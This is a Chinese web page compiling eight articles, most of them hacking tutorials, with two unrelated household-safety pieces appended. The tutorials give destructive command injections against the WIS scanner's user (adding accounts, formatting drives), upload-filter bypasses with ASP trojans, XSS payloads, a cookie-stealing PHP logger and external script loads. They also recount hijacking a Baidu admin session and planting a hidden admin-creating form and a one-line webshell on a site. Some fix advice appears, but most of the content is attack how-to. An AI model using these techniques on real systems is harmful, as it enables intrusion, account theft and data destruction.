小榕的WIS漏洞补充篇及利用篇脚本安全

| 收藏本文 下载本文 作者:houhiyo

下面是小编精心整理的小榕的WIS漏洞补充篇及利用篇脚本安全(共含8篇),仅供参考,大家一起来看看吧。同时,但愿您也能像本文投稿人“houhiyo”一样,积极向本站投稿分享好文章。

小榕的WIS漏洞补充篇及利用篇脚本安全

篇1:小榕的WIS漏洞补充篇及利用篇脚本安全

编者:昨天就看见ALLyeSNO的这个文章了,但是始终不明白原文里说的意思.直到今天......

漏洞发现者 : ALLyeSNO blog.csdn.net/freexploit/

WIS是小榕开发的SQL漏洞扫描工具

WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码

&net user allyesno 12345 /add

不是wis&net user allyesno 12345 /add

而是 使用 wis对 某一个网站进行扫描的时候

我们可以利用wis未过滤& 在被扫描的网站代码 例如asp代码中嵌入&net user administrator 12345 /add

当wis对它进行扫描的时候 结果如下

sqlbug?=sql&net“>www.target.com/sqlbug?=sql&net user administrator 12345 /add

本地执行wis &net user allyesno 12345 /add是肯犊梢缘 因为&是把两段指令连在一起执行

下面是喜欢忧伤写的一篇关于这个漏洞的文章,本来他说要好好写下再发,可我等不及了

作者:喜欢忧伤 www.powers.com.cn

问题的产生

1.&用来连接两条Dos命令,就是cmd.exe 会把&前后的命令分开两句来执行

2.wis这个工具没有过滤&

所以在

你用这个工具去扫描别人的时候就会出问题

正常情况下是

你的cmd.exe下执行wis www.xx.com/?xx.asp?id=123

没什么问题

如果碰到

www.xx.com/?xx.asp?id=123&net user test 123 /add

的时候就变成你的cmd.exe执行

wis www.xx.com/?xx.asp?id=123&net user test 123 /add

看清楚了

这个语句中有一个&,所以相当于

wis www.xx.com/?xx.asp?id=123

net user test 123 /add

也就是在你的机器上执行了两个语句,

小榕的WIS漏洞补充篇及利用篇脚本安全

。。

wis www.xx.com/?xx.asp?id=123

没问题,执行后半句的时候就来问题了,增加用户了

那你机器上当然添加了一个帐号了

当然, 还有更狠的:

www.xxx.com/a.asp?id=1&format d: /q

www.xxx.com/a.asp?id=1&format e: /q

www.xxx.com/a.asp?id=1&format f: /q

......

www.xxx.com/a.asp?id=1© c: d:

www.xxx.com/a.asp?id=1© c: e:

www.xxx.com/a.asp?id=1© c: f:

.....

d,e,f,...资料很可能全没有了,。哈哈

篇2:脚本入侵上传漏洞总结篇(臭小子)

脚本入侵-上传漏洞总结篇(臭小子),从事于网站开发的程序员要看下,不要让自己的程序别 利用,

1:抓包上传

我们可以用WSockExpert(抓包工具) hkcpost抓包提交软件或等等抓包工具

说下hkcpost有时候电脑打不开WSockExpert(抓包工具) 我们就用这工具

很好用

说到抓包上传 比如一个上传地址site/upload.asp

或后台管理后台上传地址

我们就抓包cookies 参数 和文件上传成功地址

然后用明小子或等等抓包工具 上传。大家可以去百度搜索相关的教程和文章看看

2:抓包和nc上传

抓包cookies 参数 和文件的数据 然后保存成文本 比如hack92.txt

然后用编译C32asm 或等等编译工具 修改

然后用nc.exe 提交 命令nc -vv site 80

大家可以去百度搜索下nc上传 或突破 等等教程文章看

3:本地上传漏洞

把下面的代码 保存为hack92.html

------------------------------

encType=multipart/form-data>

------------------------------------------

添加上传地址

把:把上传地址复制这里到这里 你的上传地址

然后打开hack92.html 出现两个页面 第一个上你的图片木马 然后在上你的ASP木马

提示在上asp木马记得 加个空格

4:iis漏洞

把我们的asp木马 改成xxx.asp;xxx.jpg 或xxx.asp.jpg

或建立asp.asp asa.asa 目录 上图片asp木马

5:上传突破

当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!

大家可以去百度搜索相关的文章和教程

篇3:xss漏洞发现及利用1脚本安全

漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表,

利用形式1:

myhack58.com/web2/?u=Club_talk_list&tag=

其中myhack58.com/web2/为网站连接,Club_talk_list为用户自定义版块。

利用形式2:

myhack58.com/web2/?a=list&tag=

其中myhack58.com/web2/为网站连接,这个就是所谓的全局tag搜索。

漏洞危害:欺骗用户点击假冒连接盗取访问者的cookies甚至可能危害到访问者电脑安全,涉及帐户的相关信息可能被盗取。

漏洞发现者:clin003

已向官方报告漏洞情况。请wm使用者关注官方修补办法。

官方修补办法地址: webmagik.cn/bbs/viewthread.php?tid=638&pid=2225

CODE:

1 下载 module_list.php (2.83 KB)

并上传覆盖 /meta/module/module_list.php 后台重新生成各模块代码即可。

2 不想重新手工生成代码的,可以直接修改对应的 /umod/XXX_list.php 在页面最上方添加 $_REQUEST['tag'] = strip_tags($_REQUEST['tag']);

Added By Easy

——————————————————————

临时解决办法:

在所有涉及到tag搜索的页面 添加一行代码.

[Copy to clipboard] [ - ]

CODE:

$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);

官方在下一个版本会把过滤加进去。顺便说下,在模块基本设定中,如果开启不过滤数据,用户添加的内容也可以存在此问题。

----------------------------------

补充下:

在list.php(/mod/list.php)第二十四行的位置回车加上

$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);

这个是全局搜索tag的地方更新模块的时候不会被更新。

——————————————————————

漏洞发现过程:

在寻找使用过的中文标签为什么会失效的答案。添加一篇文章,然后由于想把“中间带空格的标签”合起来而使用啦单引号比如:‘webmagik 跨站’,提交的时候就出现问题。一堆数据库错误信息!!

怀疑有注入漏洞,,经多次检测没有注入漏洞。

忽然想到检测下跨站的这个xss代码(上次已经检测过搜索框的iframe跨站漏洞,只是没公布)。

--------------------------------------------------

下边是介绍xss漏洞的常识

----------------------------------------------------

什么是跨站脚本(CSS/XSS)?

在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。

我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为”XSS“,这是因为”CSS“一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。

XSS和脚本注射的区别?

原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的

漏洞都被称为XSS,还有另一种攻击方式:”Script. Injection“,他们的区别在以下两点:

1.(Script. Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如

:sql injection,XPath injection.

2.跨站脚本是临时的,执行后就消失了

什么类型的脚本可以 入远程页面?

主流脚本包括以下几种:

HTML

JavaScript. (本文讨论)

VBScript

ActiveX

Flash

测试代码:

1,在自己服务器上建立如下文件:

Getcookie.php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$time=date(”j F, Y, g:i a“);

$referer=getenv ('HTTP_REFERER');

$fp = fopen('victim.htm', 'a');

fwrite($fp, 'Cookie: '.$cookie.'

IP: ' .$ip. '

Date and Time: ' .$time. '

Referer: '.$referer.'

');

fclose($fp);

?>

Xss.js

document.write('');

2,发送信息给管理员

内容包含下边的连接:

myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!

改进后的代码:

myhack58.com/web2/?a=list&tag=

成功收到cookies

3,等待管理员点击然后检查获得victim.htm内容。

4,复制从PHPSESSID= 到;的内容

启发来源:WEB漏洞挖掘技术

参考漏洞分析格式:PhpNuke管理员密码可泄露问题

link@myhack58.com

----------------------------------------------------------------------

相关链接:

XSS:wiki.matrix.org.cn/Wiki.jsp?page=XSS

跨站脚本攻击(XSS)FAQ:tech.idv2.com//08/30/xss-faq/

也谈跨站脚本攻击与防御:www.xfocus.net/articles/200607/874.html

浅析XSS(Cross Site Script)漏洞原:www.xker.com/page/e/0704/27444_3.html

PHP-Nuke个人消息存在HTML插入漏洞:www.xfocus.net/vuls/08/2970.html

--------------------------------------------------------------------

预防的办法:-----------------------------------------------

1.在你的WEB浏览器上禁用javascript脚本

2..开发者要仔细审核代码,对提交输入数据进行有效检查,如”<“和”>“。

可以把”<“,”>“转换为<,>

注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,

这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括”=“。

对我们浏览网页的网友来说不要访问包含

myhack58.com/web2/?a=list&tag=

myhack58.com/web2/?a=list&tag=

myhack58.com/web2/?a=list&tag=

myhack58.com/web2/?a=list&tag=

myhack58.com/web2/?a=list&tag=

upload//3/201103300326291646.bmp+onload=alert(”1111“)>

upload/2011/3/201103300326291646.bmp+onload=alert(”1111“)>

myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!

upload/2011/3/201103300326291646.bmp+onload=alert('1111')>

upload/2011/3/201103300326291646.bmp+onload=alert(1111)>

myhack58.com/web2/?a=list&tag=<”

myhack58.com/web2/?a=list&tag=<'

myhack58.com/web2/?a=list&tag=<

myhack58.com/web2/?a=list&tag=

myhack58.com/web2/?a=list&tag=

以上所有的连接都检测出漏洞

漏洞利用代码:

获得cookie

myhack58.com/web2/?a=list&tag=%3Cscript%3Ealert(document.cookie)%3C%2fscript%3E

==============================================

什么是跨站脚本(CSS/XSS)?

在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。

我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为“XSS”,这是因为“CSS”一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。

XSS和脚本注射的区别?

原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的

漏洞都被称为XSS,还有另一种攻击方式:“Script. Injection”,他们的区别在以下两点:

1.(Script. Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如

:sql injection,XPath injection.

2.跨站脚本是临时的,执行后就消失了

什么类型的脚本可以 入远程页面?

主流脚本包括以下几种:

HTML

JavaScript. (本文讨论)

VBScript

ActiveX

Flash

是什么原因导致一个站点存在XSS的安全漏洞?

许多cgi/php脚本执行时,如果它发现客户提交的请求页面并不存在或其他类型的错误时,

出错信息会被打印到一个html文件,并将该错误页面发送给访问者,

例如: 404 - yourfile.html Not Found!

我们一般对这样的信息不会注意,但是现在要研究CSS漏洞的成因,我们还是仔细看一下。

例:www.somesite.tld/cgi-bin/program.cgi?page=downloads.html该URL指向的连接是有效的,但是如果我们把后面的downloads.html替换成brainrawt_owns_me.html,一个包含404 - brainrawt_owns_me.html Not Found! 信息的页面将反馈给访问者的浏览器。

考虑一下它是如何把我们的输入写到html文件里的?

OK,现在是我们检查XSS漏洞的时候了!

注意:下面仅仅是一个例子,该页面存在XSS漏洞,我们可以插入一写javascript代码到页面里。当然方法很多www.somesite.tld/cgi-bin/program.cgi?page=

当我们提交这个URL的时候,在我们的浏览器中弹出一个消息框,“XSS_Vuln_Testing”?

这个例子只是一个XSS漏洞的简单演示,并无实际意义,但足以说明问题所在。

下面我们分析一下造成该运行结果的原因,program.cgi对我们的输入没有经过有效过滤处理,就直接写入404 error页面中,结果创建了一个页面,如下:

404-

其中的javascript脚本通过浏览器解释执行,然后就出现了你所看到的结果。

如何利用XSS来完成hacking?

如同前面所提到,如果用户提交的请求不能得到满足,那么服务器端脚本会把输入信息写入一个html文件,当服务器端程序对写入html文件的数据没有进行有效过滤,恶意脚本就可以插入到该html文件里。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。

事例:

假设你发现myemailserver.tld有CSS漏洞,你想要获得其中一个人的email帐号,比如我们的目标是b00b这个人。     www.myemailserver.tld/cgi-bin/news.cgi?article=59035

把上面存在CSS漏洞的连接修改一下:  www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red

这会创建了一个错误页面,我们得到如下信息:     Invalid Input! [article=hax0red]

当插入下面这样的javascript代码时,你的屏幕上会弹出一个包含test的消息框。

www.myemailserver.tld/cgi-bin/news.cgi?article=进行有效过滤,所以在页面发回到浏览器并执行了该脚本。

下面我们瞧瞧如何利用该漏洞入侵 b00b同志的邮箱,首先你必须知道b00b的email地址,

并且知道cookies的作用。那么你可以告诉b00b一个恶意的连接,嘿嘿,当然

它的用意就是从b00b机器中cookie信息里获得自己想要的东东。

想办法让b00b访问myemailserver.tld站点发表的文章,比如说:”亲爱的b00b,看看这个美

如何呀?”

那么当可怜的b00b访问 www.myemailserver.tld/cgi-bin/news.cgi?article=

连接时,发生什么事情?cookie都有了,你该知道怎么办了吧!

如果在你目前不是这样的情形,你可以拷贝email服务器的登陆页面,挂到其他的系统上,

然后引导用户登陆你的恶意系统页面

这样用户信息你可以记录下来,然后再把记录的信息发送回真正的email服务器页面,

那些笨蛋并不会意识到实际发生的事情。

把javascript脚本插入WEB页面的不同方法:

拷贝自:GOBBLES SECURITY ADVISORY #33

Here is a cut-n-paste collection of typical JavaScript-injection hacks

you may derive some glee from playing with.

[IE]

[IE]

[IE]

&

&{[code]}; [N4]

[N4]

[IE]

[N4]

[N4]

[IE]

[Mozilla]

[IE]

[IE]

“ nmouseover=”[code]“>

;

[xC0][xBC]script.>[code][xC0][xBC]/script. [UTF-8; IE, Opera]

----Copied from GOBBLES SECURITY ADVISORY #33----

该脚本首先通过 $ENV{'QUERY_STRING'}获得cookie,打印到$borrowed_info变量里,

通过open(EVIL_COOKIE_LOG, ”>>evil_cookie_log“),把cookie信息保存到evil_cookie_lo

g文件。

注意:上面的javascript脚本,可能在一些浏览器或者站点上不能执行,

这仅仅是我在自己的站点上做测试用的。

如何防范XSS攻击?

1.在你的WEB浏览器上禁用javascript脚本

2..开发者要仔细审核代码,对提交输入数据进行有效检查,如”<“和”>“。

可以把”<“,”>“转换为<,>

注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,

这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括”=“。

对受害者来说不要访问包含

document.write('');

xss.js

document.write('');

getcookie.php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$time=date(”j F, Y, g:i a“);

$referer=getenv ('HTTP_REFERER');

$fp = fopen('victim.txt', 'a');

fwrite($fp, 'Cookie: '.$cookie.'

IP: ' .$ip. '

Date and Time: ' .$time. '

Referer: '.$referer.'

');

fclose($fp);

?>

----------------------------------

测试 Web 应用程序是否存在跨站点脚本漏洞

发布日期: 05月06日

作者:Chris Weber,Casaba Security,LLC (chris@casabasec.com)

到目前为止,对于跨站点脚本攻击具有很大的威胁这一点大家并无异议。如果您很精通 XSS 并且只想看看有什么好的测试方法可供借鉴,那么请直接跳到本文的测试部分。如果您对此一无所知,请按顺序认真阅读!如果某个怀有恶意的人(攻击者)可以强迫某个不知情的用户(受害者)运行攻击者选择的客户端脚本,那么便会发生跨站点脚本攻击。“跨站点脚本”这个词应该属于用词不当的情况,因为它不仅与脚本有关,而且它甚至不一定是跨站点的。所以,它就是一个在发现这种攻击时起的一个名字,并且一直沿用至今。从现在开始,我们将使用它常见的缩写名称 “XSS”。

XSS 攻击的过程涉及以下三方:

攻击者

受害者

存在漏洞的网站(攻击者可以使用它对受害者采取行动)

在这三方之中,只有受害者会实际运行攻击者的代码。网站仅仅是发起攻击的一个载体,一般不会受到影响。可以用多种方式发起 XSS 攻击。例如,攻击者可通过电子邮件、IM 或其他途径向受害者发送一个经过经心构造的恶意 URL。当受害者在 Web 浏览器中打开该 URL 的时侯,网站会显示一个页面并在受害者的计算机上执行脚本。

XSS 漏洞是什么样的呢?

作为一名 Web 开发人员或测试人员,您肯定知道 Web 应用程序的技术基础是由 HTTP 和 HTML 组成的。HTTP 协议是 HTML 的传输机制,可使用代码设计 Web 页面布局和生成页面。

如果 Web 应用程序接受用户通过 HTTP 请求(如 GET 或 POST)提交的输入信息,然后使用输出 HTML 代码在某些地方显示这些信息,便可能存在 XSS 漏洞。下面是一个最简单的例子:

1. Web 请求如下所示:

GET www.somesite.com/page.asp?pageid=10&lang=en&title=Section%20Title

2. 在发出请求后,服务器返回的 HTML 内容包括:

Section Title

可以看到,传递给“title”查询字符串参数的用户输入可能被保存在一个字符串变量中并且由 Web 应用程序插入到

标记中。通过提供输入内容,攻击者可以控制 HTML。

3. 现在,如果站点没有在服务器端对用户输入加以过滤(因为总是可以绕过客户端控件),那么恶意用户便可以使用许多手段对此漏洞加以滥用:

攻击者可以通过摆脱

标记来注入代码:

www.somesite.com/page.asp?pageid=10&lang=en&title=Section%20Title

这个请求的 HTML 输出将为:

Section Title

即便是这个最简单的例子,攻击者也可以利用此连接完成数不清的事情。让我们看看会有哪些潜在的威胁,然后讨论一些更高级的测试方法。

XSS 攻击的威胁有多么严重?

由于能够在生成的 Web 页面中注入代码,能想到的威胁有多么严重,就可以有多么严重的威胁。攻击者可以使用 XSS 漏洞窃取 Cookie,劫持帐户,执行 ActiveX,执行 Flash 内容,强迫您下载软件,或者是对硬盘和数据采取操作。

只要您点击了某些 URL,这一切便有可能发生。每天之中,在阅读来自留言板或新闻组的受信任的电子邮件的时侯,您会多少次地单击其中的 URL?

网络钓鱼攻击通常利用 XSS 漏洞来装扮成合法站点。可以看到很多这样的情况,比如您的银行给你发来了一封电子邮件,向您告知对您的帐户进行了一些修改并诱使您点击某些超链接。如果仔细观察这些 URL,它们实际上可能利用了银行网站中存在的漏洞,它们的形式类似于 mybank.com/somepage?redirect=,这里利用了“redirect”参数来执行攻击。

如果您足够狡猾的话,可以将管理员定为攻击目标,您可以发送一封具有如下主题的邮件:“求救!这个网站地址总是出现错误!”在管理员打开该 URL 后,便可以执行许多恶意操作,例如窃取他(或她)的凭证。

好了,现在我们已经理解了它的危害性 -- 危害用户,危害管理员,给公司带来坏的公共形象。现在,让我们看看本文的重点 -- 测试您的网站是否存在这些问题。

篇4:利用XSS跨站漏洞入侵百度投诉中心脚本安全

简要描述:

天天看wooyun上piapiapia弹窗弹的好欢乐,但是真正利用的没几个,也导致了一些人,一些厂商,一些白帽子对XSS危害的蔑视,如果XSS的利用回想当年NBSI一样简单化,也许结果就不同了,

用事实说话。

详细说明:

我们要知道的一个事实是,很多大型互联网企业,其前台防护都很到位,但是没有人会挑保护最好的地方下手,对于前台来说,他的后台就是一个容易被忽视的地方,虽然我们不知道后台程序的构造,但是我们可以根据一些功能的性质来大胆推测,比如互联网公司安全短板--客服反馈系统。

目标地址:tousu.baidu.com

漏洞证明:

找到一个产品的投诉页面,比如文库,想这种功能比较简单的表单,我们直接提交”><这样的代码猜测>

提交后如果运气好的话,

。。。。

访问了一下后台地址,居然是外网可访问的,利用得到的cookie进行会话劫持

跨站漏洞入侵百度投诉中心 用xss平台沦陷百度投诉中心后台“ alt=”利用XSS跨站漏洞入侵百度投诉中心 用xss平台沦陷百度投诉中心后台“ src=”lcx.cc/File.asp?md5=a31140f9f3cec81d4af7fd04fd8dd26c“ data-ke-src=”lcx.cc/File.asp?md5=a31140f9f3cec81d4af7fd04fd8dd26c“ width=”685“ height=”148“ style=”border: 0px; “ nload=”return imgzoom(this,550);“ nclick=”javascript.:window.open(this.src);“ style=”cursor:pointer;“/>

还有置顶编辑功能,留个脚印

修复方案:

后台不应该对公网全网开放,另外信息展现需要做输出转义。

cookie全局httponly?

摘自:www.wooyun.org/bugs/wooyun--09547

篇5:如何防范XSS跨站脚本攻击――测试篇WEB安全

Reflected XSS(反射跨站脚本攻击)

这是最常见也是最知名的XSS攻击,当Web客户端提交数据后,服务器端立刻为这个客户生成结果页面,如果结果页面中包含未验证的客户端输入数据,那么就会允许客户端的脚本直接注入到动态页面中,传统的例子是站点搜索引擎,如果我们搜索一个包含特殊HTML字符的字符串时,通常在返回页面上仍然会有这个字符串来告知我们搜索的是什么,如果这些返回的字符串未被编码,那么,就会存在XSS漏洞了。

初看上去,由于用户只能在自己的页面上注入代码,所以似乎这个漏洞并不严重,但是,只需一点点社会工程的方法,攻击者就能诱使用户访问一个在结果页面中注入了代码的URL,这就给了攻击者整个页面的权限。由于这种攻击往往会需要一些社会工程方法,所以研发人员往往不会太过看重,但是我们看如下的例子,在服务器上有如下代码:

article.php?title=

这就使得浏览器每3秒就刷新一次页面,而且是一个死循环的状态,这就形成了DOS攻击,导致Web服务器挂掉。

DOM-Based XSS(基于DOM的XSS)

这个漏洞往往存在于客户端脚本,如果一个Javascript脚本访问需要参数的URL,且需要将该信息用于写入自己的页面,且信息未被编码,那么就有可能存在这个漏洞,

黑盒测试和示例:

比较简单的测试是否存在XSS漏洞的方法是验证Web应用是否会对一个包含了HTTP响应的简单脚本的访问请求,例如,Sambar服务器(5.3)包含一个众所周知的XSS漏洞,我们向服务器发送如下的请求,从服务器端能够产生一个响应从而在Web浏览器中执行

server/cgi-bin/testcgi.exe?

这个脚本会在客户浏览器端被执行。

我们再举个例子:

由于Javascript是区分大小写的,有些人会尝试将所有字符转换为大写字符来避免XSS漏洞,在这时,我们最好还是使用VBScript,因为它是大小写不区分的:

JavaScript.

VBScript.

如果我们已经过滤了”<”,或者是

%3cscript. src=www.example.com/malicious-code.js%3e%3c/script%3e

x3cscript. src=www.example.com/malicious-code.jsx3ex3c/scriptx3e

篇6:跨出权限―世纪热线全站程序完美版漏洞利用脚本安全

注:本文首发于 手册,.请注明来源

就这样像3389离我而去,就像4489在迎接着我们,不知不觉又长了一岁。06年可以说是注入淡却的一年。不过新的技术也在增长。

跨站虽然算不上新的技术。但在国外也是非常重视的。其实跨站代码如果构造好的话可以干出很多事来的。这不,在网上逛到了一个电影网站。

心想如果把这个站拿下来不就可以看免费的电影了。(动机不太好呀^_^)。发现程序用的是:”世纪热线全站程序完美版“于是去百度搜一下也没发有漏

洞。那么就自己下回来慢慢研究吧。

可以说这套程序在注入方面防范的还不错。但是跨站方面好象就没有做到家了。经过仔细的查找,终于被我找到了一点软胁。首先我们先注册

个用户。一般电影网站都提供影片报错的页面。这个也不例外。我们在首页随便点击一个影片。下面有个报告错误。点一下之后会打开一个页面。

因为这个报告错误只有管理员能看,我们在报告错误里写上”“,如图1所示。

点开始报告,我们再去后台的电影管理/错误报告去看一下,跨站代码被成功执行了。如图2所示。

既然这个能执行,我们在来构造一些特殊的代码吧。后台有个添加管理员的,我们先来看看它的代码是怎么实现的,添加管理员的关键代码如下:

新增管理员

用 户 名

初始密码

数字+字母10位以上

确认密码

数字+字母10位以上

权限设置

====无管理权限====

====初级管理员====

====高级管理员====

====超级管理员====

其实这个我们只在稍稍改动一下就可以了,改好的代码如下:

新增管理员

用 户 名 '添加管理员名字

初始密码 '添加管理员密码

数字+字母10位以上

确认密码 '确认管理员密码

数字+字母10位以上

权限设置

====无管理权限==== '设置为超级管理员,注意这里是1

====初级管理员====

====高级管理员====

====超级管理员====

最重要的就是action后的路径和最后自动运行的脚本,路径大家一定要对上,

把上面的代码为hacklu.htm上传到自己的空间。然后再来到错误

报告的地方写上我们的挂马代码:

间的地址。这样管理员在看错误报告的时候就会添加一个名为:hacklu119的超级管理员。如图3、图4所示。

其实我们还可以构造备份WEBSHELL什么的,只是这个后台没有备份数据库的功能。所以得到WEBSHELL有一定的困难。刚开始我在添加电影的地

方上传ASP木马。又是抓名又是改扩展名的,可惜还没有成功。后来不经意发现原来这个数据库是ASP的,那么就好办了。只接在添加电影的地方

写上我们的一句话的ASP木马,如图5所示。

最后添加一下我们用客户端连接 127.0.0.1/data/jdzcn.asp 如图6所示,连接成功后会生成killbase.asp文件。最后成功得到WEBSHELL。见图7。

不过如果数据库改了名字的话,那么得WEBSHELL就不容易了。最后欢迎大家到NOHACK/BBS和我交流。我的ID是樱花浪子。

篇7:安全生产的小知识多篇集合

电磁炉卫生清洁、无火烹饪、使用方便等特点而深受消费者的青睐。现使用电磁炉的家庭越来越多,怎样安全正确地使用电磁炉呢,下面就和大家讲讲有关电磁炉使用时的注意事项。

使用时要“四做到”、“五注意”

“四做到”

1、锅具不要太重。电磁炉不同于砖或铁等材料结构建造的炉具,其承载量是有限的,一般连锅具带食物不应超过5公斤,而且锅具底部也不宜过小,以使炉面的受压之力不至于过重、过于集中。正在使用或刚结束使用的炉面不要马上用冷水去擦。

2、要检测炉具保护功能是否完好。电磁炉虽具有良好的自动检测及自我保护功能,它可以检测出如炉面器具使用是否得当,炉温是否过高。但也不能过分依赖,使用时间长了会产生老化失效的可能,应注意检测炉具的保护功能是否完好。丧失自动保护功能的电磁炉使用起来是很危险的。

3、电源线要符合要求。电磁炉由于功率大,在配置电源线时应选能承受15A电流的铜芯线,配套使用的插座、插头、开关等也要达到这一要求。因其用电量大,最好不要同其他电器并联使用同一插座。

4、保证气孔要通畅。工作中的电磁炉随锅具的升温而升温,因此在厨房安放电磁炉时,应保证炉体的进、排气孔处无任何物体阻挡。炉体的侧面、下面不要垫(堆)放可能损害电磁炉的物体、液体。

“五注意”

1、要有独立插座。一般电磁炉的功率较大,对使用家庭的电负荷要求较高,所以尽量不要与其他电器共线。

2、周围别堆杂物。电磁炉在工作过程中产生的热量靠炉内的冷却风扇散去,要防止炉子太热引发事故。所以,放置电磁炉,不要靠墙壁太近。使用时,周围不要摆太多东西,还要注意把灶台弄干净,防止灰尘或纸屑堵住风口。

3、平时,不要在上面放金属的东西,以免错误启动炉子。

4、锅要轻拿轻放。灶面是电磁炉的易损部件。一般连锅具带食物不应超过5公斤,锅具底部也不宜过小。

5、清洁时要轻柔。电磁炉要防水防潮,避免接触有害液体和刮伤。所以,可以用湿软布蘸清洁剂擦,避免泡水冲洗、硬刷。

篇8:安全生产的小知识多篇集合

遇到煤气中毒要如何自救

(1)开窗呼救 感觉自己有中毒迹象,应打开门窗呼吸新鲜空气,高声呼救,或迅速撤离现场。

(2)宽衣解扣立即开窗通风,将患者抬离中毒现场。及时为患者松解衣扣,保证其呼吸通畅,并注意保暖。

(3)静养吸氧 患者需安静休息,尽量减少心肺负担和耗氧量。如有条件,应对患者人工输氧。

(4)侧向呕吐 头部偏向一侧,及时清理其口鼻内的分泌物,以免患者回吸,导致窒息。

(5)按穴就医对烦躁不安的患者,用手导引“人中”、“足三里”“内关”等穴位,同时尽早呼叫“120”就医。

(6)心肺复苏 若患者呼吸、心跳微弱甚至停止,应立即实施心肺复苏术,直到医务人员到来。

(7)高压氧舱 应将煤气中毒者送往配有高压氧舱的医院,以利于抢救,减少后遗症。

特别提醒:炉边放水,不能防毒。有些人认为在炉边放盆冷水就可以防止煤气中毒,实际上这是完全无效的。

哲理小故事「篇」

安全质量演讲稿篇

安全演讲稿优秀篇

优秀篇小学生安全保证书

应急演练方案安全应急篇

幼儿园教师安全协议书优秀篇

校园安全学生演讲稿精选篇

太上感应篇原文及翻译

演讲稿的格式及篇范文

论语为政篇原文及翻译

小榕的WIS漏洞补充篇及利用篇脚本安全(共8篇)

欢迎下载DOC格式的小榕的WIS漏洞补充篇及利用篇脚本安全,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档